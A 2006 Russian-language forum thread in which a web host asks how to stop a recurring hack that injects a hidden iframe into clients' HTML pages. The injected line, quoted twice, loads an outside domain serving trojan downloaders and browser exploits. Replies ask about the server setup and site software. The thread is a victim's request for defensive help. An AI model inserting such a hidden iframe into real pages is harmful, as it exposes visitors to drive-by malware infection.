URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID1
Нить номер: 68582
[ Назад ]

Исходное сообщение
"эксплойты и трояны"
Отправлено visitor , 30-Авг-06 16:06

Здравствуйте.
У моих клиентов хостинга периодически возникают проблемы сабжа.
На их страницах появляется следующее:
<iframe src="http://zetbvdpbjh.biz/dl/adv646.php" width=0 height=0></iframe>
Подгружаются
a.exe - модифицированный Win32/TrojanDownloader.Small.DIB троян
Win32/TrojanDownloader.Small.DIB троян
JS/Exploit.CVE-2005-1790.J
Win32/Exploit.WMF троян
и еще всякая дрянь.
Из-за этого банят домены, мыла...
Код с ифреймом появляется постоянно на любых страницах. Каждый раз приходиться рекурсивно искать этот код на их старницах и удалять... Но потом все заново повторяется.
Может кто-нибудь объяснить почему это происходит, где искать дыру, как с этим бороться.
Заранее спасибо.

Содержание

эксплойты и трояны,bestia, 17:13 , 30-Авг-06
эксплойты и трояны,visitor, 17:37 , 30-Авг-06
эксплойты и трояны,novachok, 18:33 , 30-Авг-06
- эксплойты и трояны,visitor, 13:16 , 01-Сен-06
  - эксплойты и трояны,Kirill_AG, 14:23 , 01-Сен-06

Сообщения в этом обсуждении

"эксплойты и трояны"
Отправлено bestia , 30-Авг-06 17:13

Может стоит перестать притворяться хостером, а пойти поучиться, чтобы проблем не возникало?

"эксплойты и трояны"
Отправлено visitor , 30-Авг-06 17:37

>Здравствуйте.
>У моих клиентов хостинга периодически возникают проблемы сабжа.
>На их страницах появляется следующее:
><iframe src="http://zetbvdpbjh.biz/dl/adv646.php" width=0 height=0></iframe>
>Подгружаются
>a.exe - модифицированный Win32/TrojanDownloader.Small.DIB троян
> Win32/TrojanDownloader.Small.DIB троян
> JS/Exploit.CVE-2005-1790.J
> Win32/Exploit.WMF троян
>и еще всякая дрянь.
>Из-за этого банят домены, мыла...
>Код с ифреймом появляется постоянно на любых страницах. Каждый раз приходиться рекурсивно
>искать этот код на их старницах и удалять... Но потом все
>заново повторяется.
>Может кто-нибудь объяснить почему это происходит, где искать дыру, как с этим
>бороться.
>Заранее спасибо.
Кто-нибудь может помочь с решением проблемы сабжа? В отличии от умника bestia

"эксплойты и трояны"
Отправлено novachok , 30-Авг-06 18:33

а на чем у твоих клиентов их творение писано? может там дыр полно?
вообщем надо определиться через что лезут: через дырявые страницы или через дырявый хостинг.

"эксплойты и трояны"
Отправлено visitor , 01-Сен-06 13:16

>а на чем у твоих клиентов их творение писано? может там дыр
>полно?
>
>вообщем надо определиться через что лезут: через дырявые страницы или через дырявый
>хостинг.
я просканировал все страницы клиентов. Эксплоиты встречаються только в *.html, *.htm, *.shtml страницах.

"эксплойты и трояны"
Отправлено Kirill_AG , 01-Сен-06 14:23

>>а на чем у твоих клиентов их творение писано? может там дыр
>>полно?
>>
>>вообщем надо определиться через что лезут: через дырявые страницы или через дырявый
>>хостинг.
>
>я просканировал все страницы клиентов. Эксплоиты встречаються только в *.html, *.htm, *.shtml
>страницах.

Хостинг - понятие расплывчатое. Если вы что-то соображаете, то наверное должны уже догадаться, что надо было бы рассказать что вы под хостингом понимаете, какая система, что на неё накручено и т.д. До этого вам никто не поможет. Попробуйте представить себя человеком, который понятия не имеет о том, что у вас и как, и прочтите свой вопрос.
ps: Есть ли в системе процессы левые? Используются ли какой-либо готовый форум на пехепе? и т.д. и т.д.